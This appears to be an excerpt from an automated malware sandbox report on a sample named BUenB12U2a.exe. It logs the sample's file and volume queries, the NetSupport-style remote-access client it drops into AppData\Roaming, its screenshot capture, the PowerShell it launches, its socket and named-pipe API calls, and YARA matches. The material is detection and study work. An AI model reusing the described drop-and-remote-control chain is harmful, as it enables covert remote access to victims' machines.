                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\unicodedata.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\psutil\_psutil_windows.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imaging.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\build.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.ini VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\HTCTL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\msvcr100.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\nskbfltr.inf VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\NSM.LIC VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\pcicapi.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\PCICHEK.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\PCICL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\TCCTL32.DLL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\AudioCapture.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\extracted\client32.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL\_imagingmath.cp311-win_amd64.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Roaming\screenshot.png VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi\cacert.pem VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD26930 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,6_2_6CD26930
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1D080 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF76CA1D080
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9979B0 GetVersionExA,GetUserNameA,6_2_6C9979B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA35C70 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF76CA35C70
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10703240 CapiListen,6_2_10703240
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C998F80 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,LeaveCriticalSection,GetTickCount,InterlockedExchange,6_2_6C998F80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD0C4C0 __CxxThrowException@8,__CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_6CD0C4C0
                                Source: Yara matchFile source: 9.2.client32.exe.72a00000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.6cde0658.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e480f8100.12.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.72a00000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.72a00000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6cde0658.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.6cde0658.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.0.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.0.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.a60000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e488e6cb8.11.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e4791b9b0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e478fb940.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.10700000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e480f8100.14.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6c990000.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e48086cf8.10.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 12.2.client32.exe.6cc40000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.BUenB12U2a.exe.20e478f4cf0.9.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.6cc40000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 9.2.client32.exe.6cc40000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000009.00000002.1882255338.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.3578238205.000000006CE09000.00000004.00000001.01000000.00000017.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
